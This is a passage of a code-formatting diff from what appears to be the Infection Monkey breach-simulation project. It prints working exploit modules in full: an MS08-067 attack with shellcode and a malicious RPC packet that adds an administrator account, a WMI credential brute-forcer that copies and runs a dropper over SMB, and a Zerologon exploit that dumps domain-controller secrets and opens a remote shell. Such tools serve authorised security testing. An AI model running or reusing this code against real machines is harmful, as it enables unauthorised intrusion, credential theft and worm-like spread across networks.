"\x2e\x00\x5c\x00\x0a\x32\xbb\x77" +PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00" +PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae" +PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00" +PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43" +PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff" +PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75" +PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5" +PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6" +PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00" class WindowsVersion(IntEnum): @@ -141,10 +149,10 @@ class SRVSVC_Exploit(object): LOG.debug("Connected to %s", target_rpc_name) self._dce = self._trans.DCERPC_class(self._trans) - self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) + self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0"))) dce_packet = self._build_dce_packet() - self._dce.call(0x1f, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation + self._dce.call(0x1F, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation LOG.debug("Exploit sent to %s successfully...", self._target) LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port()) @@ -157,52 +165,57 @@ class SRVSVC_Exploit(object): if self.os_version == WindowsVersion.WindowsXP: return XP_PACKET # Constructing Malicious Packet - dce_packet = '\x01\x00\x00\x00' - dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' + dce_packet = "\x01\x00\x00\x00" + dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00" dce_packet += SHELLCODE - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x41\x41\x41\x41\x41\x41\x41\x41' - dce_packet += '\x00\x00\x00\x00' - dce_packet += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00' + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41" + dce_packet += "\x00\x00\x00\x00" + dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00" dce_packet += self._payload - dce_packet += '\x00\x00\x00\x00' - dce_packet += '\x02\x00\x00\x00\x02\x00\x00\x00' - dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00' - dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00' - dce_packet += '\x01\x00\x00\x00' + dce_packet += "\x00\x00\x00\x00" + dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00" + dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00" + dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00" + dce_packet += "\x01\x00\x00\x00" return dce_packet class Ms08_067_Exploiter(HostExploiter): - _TARGET_OS_TYPE = ['windows'] - _EXPLOITED_SERVICE = 'Microsoft Server Service' - _windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2, - 'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2, - 'Windows 5.1': WindowsVersion.WindowsXP} + _TARGET_OS_TYPE = ["windows"] + _EXPLOITED_SERVICE = "Microsoft Server Service" + _windows_versions = { + "Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2, + "Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2, + "Windows 5.1": WindowsVersion.WindowsXP, + } def __init__(self, host): super(Ms08_067_Exploiter, self).__init__(host) def is_os_supported(self): - if self.host.os.get('type') in self._TARGET_OS_TYPE and \ - self.host.os.get('version') in list(self._windows_versions.keys()): + if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list( + self._windows_versions.keys() + ): return True - if not self.host.os.get('type') or ( - self.host.os.get('type') in self._TARGET_OS_TYPE and not self.host.os.get('version')): + if not self.host.os.get("type") or ( + self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version") + ): is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) if is_smb_open: smb_finger = SMBFinger() if smb_finger.get_host_fingerprint(self.host): - return self.host.os.get('type') in self._TARGET_OS_TYPE and \ - self.host.os.get('version') in list(self._windows_versions.keys()) + return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get( + "version" + ) in list(self._windows_versions.keys()) return False def _exploit_host(self): @@ -212,7 +225,9 @@ class Ms08_067_Exploiter(HostExploiter): LOG.info("Can't find suitable monkey executable for host %r", self.host) return False - os_version = self._windows_versions.get(self.host.os.get('version'), WindowsVersion.Windows2003_SP2) + os_version = self._windows_versions.get( + self.host.os.get("version"), WindowsVersion.Windows2003_SP2 + ) exploited = False for _ in range(self._config.ms08_067_exploit_attempts): @@ -221,11 +236,14 @@ class Ms08_067_Exploiter(HostExploiter): try: sock = exploit.start() - sock.send("cmd /c (net user {} {} /add) &&" - " (net localgroup administrators {} /add)\r\n".format( - self._config.user_to_add, - self._config.remote_user_pass, - self._config.user_to_add).encode()) + sock.send( + "cmd /c (net user {} {} /add) &&" + " (net localgroup administrators {} /add)\r\n".format( + self._config.user_to_add, + self._config.remote_user_pass, + self._config.user_to_add, + ).encode() + ) time.sleep(2) sock.recv(1000) @@ -241,20 +259,24 @@ class Ms08_067_Exploiter(HostExploiter): return False # copy the file remotely using SMB - remote_full_path = SmbTools.copy_file(self.host, - src_path, - self._config.dropper_target_path_win_32, - self._config.user_to_add, - self._config.remote_user_pass) + remote_full_path = SmbTools.copy_file( + self.host, + src_path, + self._config.dropper_target_path_win_32, + self._config.user_to_add, + self._config.remote_user_pass, + ) if not remote_full_path: # try other passwords for administrator for password in self._config.exploit_password_list: - remote_full_path = SmbTools.copy_file(self.host, - src_path, - self._config.dropper_target_path_win_32, - "Administrator", - password) + remote_full_path = SmbTools.copy_file( + self.host, + src_path, + self._config.dropper_target_path_win_32, + "Administrator", + password, + ) if remote_full_path: break @@ -263,16 +285,20 @@ class Ms08_067_Exploiter(HostExploiter): # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - SRVSVC_Exploit.TELNET_PORT, - self._config.dropper_target_path_win_32) + cmdline = DROPPER_CMDLINE_WINDOWS % { + "dropper_path": remote_full_path + } + build_monkey_commandline( + self.host, + get_monkey_depth() - 1, + SRVSVC_Exploit.TELNET_PORT, + self._config.dropper_target_path_win_32, + ) else: - cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - vulnerable_port=SRVSVC_Exploit.TELNET_PORT) + cmdline = MONKEY_CMDLINE_WINDOWS % { + "monkey_path": remote_full_path + } + build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT + ) try: sock.send(("start %s\r\n" % (cmdline,)).encode()) @@ -286,7 +312,11 @@ class Ms08_067_Exploiter(HostExploiter): except socket.error: pass - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - remote_full_path, self.host, cmdline) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + remote_full_path, + self.host, + cmdline, + ) return True diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index 348fd230c..7120f5720 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -7,7 +7,11 @@ from impacket.dcerpc.v5.rpcrt import DCERPCException from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS @@ -16,9 +20,9 @@ LOG = logging.getLogger(__name__) class WmiExploiter(HostExploiter): - _TARGET_OS_TYPE = ['windows'] + _TARGET_OS_TYPE = ["windows"] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE - _EXPLOITED_SERVICE = 'WMI (Windows Management Instrumentation)' + _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)" VULNERABLE_PORT = 135 def __init__(self, host): @@ -38,8 +42,10 @@ class WmiExploiter(HostExploiter): password_hashed = self._config.hash_sensitive_data(password) lm_hash_hashed = self._config.hash_sensitive_data(lm_hash) ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash) - creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \ - "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed) + creds_for_logging = ( + "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " + "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed) + ) LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging) wmi_connection = WmiTools.WmiConnection() @@ -48,14 +54,20 @@ class WmiExploiter(HostExploiter): wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash) except AccessDeniedException: self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) - LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging) + LOG.debug( + ("Failed connecting to %r using WMI with " % self.host) + creds_for_logging + ) continue except DCERPCException: self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) - LOG.debug(("Failed connecting to %r using WMI with " % self.host) + creds_for_logging) + LOG.debug( + ("Failed connecting to %r using WMI with " % self.host) + creds_for_logging + ) continue except socket.error: - LOG.debug(("Network error in WMI connection to %r with " % self.host) + creds_for_logging) + LOG.debug( + ("Network error in WMI connection to %r with " % self.host) + creds_for_logging + ) return False except Exception as exc: LOG.debug( @@ -68,9 +80,12 @@ class WmiExploiter(HostExploiter): self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) # query process list and check if monkey already running on victim - process_list = WmiTools.list_object(wmi_connection, "Win32_Process", - fields=("Caption",), - where="Name='%s'" % ntpath.split(src_path)[-1]) + process_list = WmiTools.list_object( + wmi_connection, + "Win32_Process", + fields=("Caption",), + where="Name='%s'" % ntpath.split(src_path)[-1], + ) if process_list: wmi_connection.close() @@ -78,45 +93,62 @@ class WmiExploiter(HostExploiter): return False # copy the file remotely using SMB - remote_full_path = SmbTools.copy_file(self.host, - src_path, - self._config.dropper_target_path_win_32, - user, - password, - lm_hash, - ntlm_hash, - self._config.smb_download_timeout) + remote_full_path = SmbTools.copy_file( + self.host, + src_path, + self._config.dropper_target_path_win_32, + user, + password, + lm_hash, + ntlm_hash, + self._config.smb_download_timeout, + ) if not remote_full_path: wmi_connection.close() return False # execute the remote dropper in case the path isn't final elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): - cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - WmiExploiter.VULNERABLE_PORT, - self._config.dropper_target_path_win_32) + cmdline = DROPPER_CMDLINE_WINDOWS % { + "dropper_path": remote_full_path + } + build_monkey_commandline( + self.host, + get_monkey_depth() - 1, + WmiExploiter.VULNERABLE_PORT, + self._config.dropper_target_path_win_32, + ) else: - cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - WmiExploiter.VULNERABLE_PORT) + cmdline = MONKEY_CMDLINE_WINDOWS % { + "monkey_path": remote_full_path + } + build_monkey_commandline( + self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT + ) # execute the remote monkey - result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline, - ntpath.split(remote_full_path)[0], - None) + result = WmiTools.get_object(wmi_connection, "Win32_Process").Create( + cmdline, ntpath.split(remote_full_path)[0], None + ) if (0 != result.ProcessId) and (not result.ReturnValue): - LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", - remote_full_path, self.host, result.ProcessId, cmdline) + LOG.info( + "Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", + remote_full_path, + self.host, + result.ProcessId, + cmdline, + ) - self.add_vuln_port(port='unknown') + self.add_vuln_port(port="unknown") success = True else: - LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)", - remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline) + LOG.debug( + "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)", + remote_full_path, + self.host, + result.ProcessId, + result.ReturnValue, + cmdline, + ) success = False result.RemRelease() diff --git a/monkey/infection_monkey/exploit/zerologon.py b/monkey/infection_monkey/exploit/zerologon.py index aa82d78c5..a30ceda2d 100644 --- a/monkey/infection_monkey/exploit/zerologon.py +++ b/monkey/infection_monkey/exploit/zerologon.py @@ -17,8 +17,7 @@ from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump -from infection_monkey.exploit.zerologon_utils.vuln_assessment import ( - get_dc_details, is_exploitable) +from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec from infection_monkey.utils.capture_output import StdoutCapture @@ -120,9 +119,7 @@ class ZerologonExploiter(HostExploiter): request["AccountName"] = dc_name + "$\x00" request["ComputerName"] = dc_name + "\x00" - request[ - "SecureChannelType" - ] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel + request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel request["Authenticator"] = authenticator def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool: @@ -151,9 +148,7 @@ class ZerologonExploiter(HostExploiter): LOG.debug("DCSync; getting usernames and their passwords' hashes.") user_creds = self.get_all_user_creds() if not user_creds: - raise Exception( - "Couldn't extract any usernames and/or their passwords' hashes." - ) + raise Exception("Couldn't extract any usernames and/or their passwords' hashes.") # Use above extracted credentials to get original DC password's hashes. LOG.debug("Getting original DC password's NT hash.") @@ -165,15 +160,11 @@ class ZerologonExploiter(HostExploiter): user_details[1]["nt_hash"], ] try: - original_pwd_nthash = self.get_original_pwd_nthash( - username, user_pwd_hashes - ) + original_pwd_nthash = self.get_original_pwd_nthash(username, user_pwd_hashes) if original_pwd_nthash: break except Exception as e: - LOG.info( - f"Credentials didn\'t work. Exception: {str(e)}" - ) + LOG.info(f"Credentials didn't work. Exception: {str(e)}") if not original_pwd_nthash: raise Exception("Couldn't extract original DC password's NT hash.") @@ -187,9 +178,7 @@ class ZerologonExploiter(HostExploiter): # Start restoration attempts. LOG.debug("Attempting password restoration.") - _restored = self._send_restoration_rpc_login_requests( - rpc_con, original_pwd_nthash - ) + _restored = self._send_restoration_rpc_login_requests(rpc_con, original_pwd_nthash) if not _restored: raise Exception("Failed to restore password! Max attempts exceeded?") @@ -244,9 +233,7 @@ class ZerologonExploiter(HostExploiter): username: str = "", options: Optional[object] = None, ) -> List[str]: - dumper = DumpSecrets( - remote_name=remote_name, username=username, options=options - ) + dumper = DumpSecrets(remote_name=remote_name, username=username, options=options) dumped_secrets = dumper.dump().split("\n") return dumped_secrets @@ -280,9 +267,7 @@ class ZerologonExploiter(HostExploiter): self._extracted_creds[user]["nt_hash"], ) - def add_extracted_creds_to_exploit_info( - self, user: str, lmhash: str, nthash: str - ) -> None: + def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None: self.exploit_info["credentials"].update( { user: { @@ -295,9 +280,7 @@ class ZerologonExploiter(HostExploiter): ) # so other exploiters can use these creds - def add_extracted_creds_to_monkey_config( - self, user: str, lmhash: str, nthash: str - ) -> None: + def add_extracted_creds_to_monkey_config(self, user: str, lmhash: str, nthash: str) -> None: if user not in self._config.exploit_user_list: self._config.exploit_user_list.append(user) @@ -320,13 +303,9 @@ class ZerologonExploiter(HostExploiter): security=os.path.join(os.path.expanduser("~"), "monkey-security.save"), ) - dumped_secrets = self.get_dumped_secrets( - remote_name="LOCAL", options=options - ) + dumped_secrets = self.get_dumped_secrets(remote_name="LOCAL", options=options) for secret in dumped_secrets: - if ( - "$MACHINE.ACC: " in secret - ): # format of secret - "$MACHINE.ACC: lmhash:nthash" + if "$MACHINE.ACC: " in secret: # format of secret - "$MACHINE.ACC: lmhash:nthash" nthash = secret.split(":")[2] return nthash @@ -340,14 +319,14 @@ class ZerologonExploiter(HostExploiter): def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool: LOG.info( - f'Starting remote shell on victim with credentials:\n' - f'user: {username}\n' - f'hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : ' - f'{self._config.hash_sensitive_data(user_pwd_hashes[1])}' + f"Starting remote shell on victim with credentials:\n" + f"user: {username}\n" + f"hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : " + f"{self._config.hash_sensitive_data(user_pwd_hashes[1])}" ) wmiexec = Wmiexec( - ip=self.dc_ip, username=username, hashes=':'.join(user_pwd_hashes), domain=self.dc_ip + ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip ) remote_shell = wmiexec.get_remote_shell() @@ -391,21 +370,13 @@ class ZerologonExploiter(HostExploiter): try: os.remove(path) except Exception as e: - LOG.info( - f"Exception occurred while removing file {path} from system: {str(e)}" - ) + LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}") - def _send_restoration_rpc_login_requests( - self, rpc_con, original_pwd_nthash - ) -> bool: + def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> bool: for _ in range(0, self.MAX_ATTEMPTS): - restoration_attempt_result = self.try_restoration_attempt( - rpc_con, original_pwd_nthash - ) + restoration_attempt_result = self.try_restoration_attempt(rpc_con, original_pwd_nthash) - is_restored = self.assess_restoration_attempt_result( - restoration_attempt_result - ) + is_restored = self.assess_restoration_attempt_result(restoration_attempt_result) if is_restored: return is_restored @@ -415,9 +386,7 @@ class ZerologonExploiter(HostExploiter): self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str ) -> Optional[object]: try: - restoration_attempt_result = self.attempt_restoration( - rpc_con, original_pwd_nthash - ) + restoration_attempt_result = self.attempt_restoration(rpc_con, original_pwd_nthash) return restoration_attempt_result except nrpc.DCERPCSessionError as e: # Failure should be due to a STATUS_ACCESS_DENIED error. @@ -481,9 +450,7 @@ class ZerologonExploiter(HostExploiter): def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool: if restoration_attempt_result: - LOG.debug( - "DC machine account password should be restored to its original value." - ) + LOG.debug("DC machine account password should be restored to its original value.") return True return False diff --git a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py index b196528e7..9d2116d07 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py +++ b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py @@ -131,10 +131,7 @@ class DumpSecrets: try: self.connect() except Exception as e: - if ( - os.getenv("KRB5CCNAME") is not None - and self.__do_kerberos is True - ): + if os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True: # SMBConnection failed. That might be because there was no way to log into the # target system. We just have a last resort. Hope we have tickets cached and that they # will work diff --git a/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py b/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py index 146d58615..3b635f6b5 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py +++ b/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py @@ -83,9 +83,7 @@ class RemoteShell(cmd.Cmd): newPath = ntpath.normpath(ntpath.join(self.__pwd, src_path)) drive, tail = ntpath.splitdrive(newPath) filename = ntpath.basename(tail) - local_file_path = os.path.join( - os.path.expanduser("~"), "monkey-" + filename - ) + local_file_path = os.path.join(os.path.expanduser("~"), "monkey-" + filename) fh = open(local_file_path, "wb") LOG.info("Downloading %s\\%s" % (drive, tail)) self.__transferClient.getFile(drive[:-1] + "$", tail, fh.write) @@ -148,9 +146,7 @@ class RemoteShell(cmd.Cmd): while True: try: - self.__transferClient.getFile( - self.__share, self.__output, output_callback - ) + self.__transferClient.getFile(self.__share, self.__output, output_callback) break except Exception as e: if str(e).find("STATUS_SHARING_VIOLATION") >= 0: @@ -166,9 +162,7 @@ class RemoteShell(cmd.Cmd): def execute_remote(self, data): command = self.__shell + data if self.__noOutput is False: - command += ( - " 1> " + "\\\\127.0.0.1\\%s" % self.__share + self.__output + " 2>&1" - ) + command += " 1> " + "\\\\127.0.0.1\\%s" % self.__share + self.__output + " 2>&1" self.__win32Process.Create(command, self.__pwd, None) self.get_output() diff --git a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py index 3470dd39a..467c41d69 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py +++ b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py @@ -23,14 +23,15 @@ def _get_dc_name(dc_ip: str) -> str: """ nb = nmb.NetBIOS.NetBIOS() name = nb.queryIPForName( - ip=dc_ip, - timeout=MEDIUM_REQUEST_TIMEOUT + ip=dc_ip, timeout=MEDIUM_REQUEST_TIMEOUT ) # returns either a list of NetBIOS names or None if name: return name[0] else: - raise DomainControllerNameFetchError("Couldn't get domain controller's name, maybe it's on external network?") + raise DomainControllerNameFetchError( + "Couldn't get domain controller's name, maybe it's on external network?" + ) def is_exploitable(zerologon_exploiter_object) -> (bool, Optional[rpcrt.DCERPC_v5]): @@ -44,9 +45,7 @@ def is_exploitable(zerologon_exploiter_object) -> (bool, Optional[rpcrt.DCERPC_v # Try authenticating. for _ in range(0, zerologon_exploiter_object.MAX_ATTEMPTS): try: - rpc_con_auth_result = _try_zero_authenticate( - zerologon_exploiter_object, rpc_con - ) + rpc_con_auth_result = _try_zero_authenticate(zerologon_exploiter_object, rpc_con) if rpc_con_auth_result is not None: return True, rpc_con_auth_result except Exception as ex: @@ -56,9 +55,7 @@ def is_exploitable(zerologon_exploiter_object) -> (bool, Optional[rpcrt.DCERPC_v return False, None -def _try_zero_authenticate( - zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5 -) -> rpcrt.DCERPC_v5: +def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5: plaintext = b"\x00" * 8 ciphertext = b"\x00" * 8 flags = 0x212FFFFF diff --git a/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py b/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py index 1beaafddd..2486998e4 100644 --- a/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py +++ b/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py @@ -95,9 +95,7 @@ class Wmiexec: wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login ) iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) - self.iWbemServices = iWbemLevel1Login.NTLMLogin( - "//./root/cimv2", NULL, NULL - ) + self.iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) iWbemLevel1Login.RemRelease() except (Exception, KeyboardInterrupt) as e: diff --git a/monkey/infection_monkey/main.py b/monkey/infection_monkey/main.py index 945ccd8cf..e0c0eef08 100644 --- a/monkey/infection_monkey/main.py +++ b/monkey/infection_monkey/main.py @@ -17,29 +17,29 @@ from infection_monkey.model import DROPPER_ARG, MONKEY_ARG from infection_monkey.monkey import InfectionMonkey from infection_monkey.utils.monkey_log_path import get_dropper_log_path, get_monkey_log_path -__author__ = 'itamar' +__author__ = "itamar" LOG = None -LOG_CONFIG = {'version': 1, - 'disable_existing_loggers': False, - 'formatters': { - 'standard': { - 'format': - '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s' - }, - }, - 'handlers': {'console': {'class': 'logging.StreamHandler', - 'level': 'DEBUG', - 'formatter': 'standard'}, - 'file': {'class': 'logging.FileHandler', - 'level': 'DEBUG', - 'formatter': 'standard', - 'filename': None} - }, - 'root': {'level': 'DEBUG', - 'handlers': ['console']}, - } +LOG_CONFIG = { + "version": 1, + "disable_existing_loggers": False, + "formatters": { + "standard": { + "format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s" + }, + }, + "handlers": { + "console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"}, + "file": { + "class": "logging.FileHandler", + "level": "DEBUG", + "formatter": "standard", + "filename": None, + }, + }, + "root": {"level": "DEBUG", "handlers": ["console"]}, +} def main(): @@ -56,7 +56,7 @@ def main(): config_file = EXTERNAL_CONFIG_FILE arg_parser = argparse.ArgumentParser() - arg_parser.add_argument('-c', '--config') + arg_parser.add_argument("-c", "--config") opts, monkey_args = arg_parser.parse_known_args(sys.argv[2:]) if opts.config: config_file = opts.config @@ -70,13 +70,22 @@ def main(): except ValueError as e: print("Error loading config: %s, using default" % (e,)) else: - print("Config file wasn't supplied and default path: %s wasn't found, using internal default" % (config_file,)) + print( + "Config file wasn't supplied and default path: %s wasn't found, using internal default" + % (config_file,) + ) - print("Loaded Configuration: %r" % WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict())) + print( + "Loaded Configuration: %r" + % WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()) + ) # Make sure we're not in a machine that has the kill file - kill_path = os.path.expandvars( - WormConfiguration.kill_file_path_windows) if sys.platform == "win32" else WormConfiguration.kill_file_path_linux + kill_path = ( + os.path.expandvars(WormConfiguration.kill_file_path_windows) + if sys.platform == "win32" + else WormConfiguration.kill_file_path_linux + ) if os.path.exists(kill_path): print("Kill path found, finished run") return True @@ -101,23 +110,24 @@ def main(): os.remove(log_path) except OSError: pass - LOG_CONFIG['handlers']['file']['filename'] = log_path + LOG_CONFIG["handlers"]["file"]["filename"] = log_path # noinspection PyUnresolvedReferences - LOG_CONFIG['root']['handlers'].append('file') + LOG_CONFIG["root"]["handlers"].append("file") else: - del LOG_CONFIG['handlers']['file'] + del LOG_CONFIG["handlers"]["file"] logging.config.dictConfig(LOG_CONFIG) LOG = logging.getLogger() def log_uncaught_exceptions(ex_cls, ex, tb): - LOG.critical(''.join(traceback.format_tb(tb))) - LOG.critical('{0}: {1}'.format(ex_cls, ex)) + LOG.critical("".join(traceback.format_tb(tb))) + LOG.critical("{0}: {1}".format(ex_cls, ex)) sys.excepthook = log_uncaught_exceptions - LOG.info(">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", - monkey_cls.__name__, os.getpid()) + LOG.info( + ">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid() + ) LOG.info(f"version: {get_version()}") @@ -128,9 +138,16 @@ def main(): monkey.start() if WormConfiguration.serialize_config: - with open(config_file, 'w') as config_fo: + with open(config_file, "w") as config_fo: json_dict = WormConfiguration.as_dict() - json.dump(json_dict, config_fo, skipkeys=True, sort_keys=True, indent=4, separators=(',', ': ')) + json.dump( + json_dict, + config_fo, + skipkeys=True, + sort_keys=True, + indent=4, + separators=(",", ": "), + ) return True except Exception as e: diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 4f3f2c27d..4f6f8de4a 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py @@ -1,6 +1,6 @@ from infection_monkey.model.host import VictimHost # noqa: F401 -__author__ = 'itamar' +__author__ = "itamar" MONKEY_ARG = "m0nk3y" DROPPER_ARG = "dr0pp3r" @@ -8,22 +8,46 @@ ID_STRING = "M0NK3Y3XPL0ITABLE" # CMD prefix for windows commands CMD_PREFIX = "cmd.exe /c" -DROPPER_CMDLINE_WINDOWS = '%s %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,) -MONKEY_CMDLINE_WINDOWS = '%s %%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,) 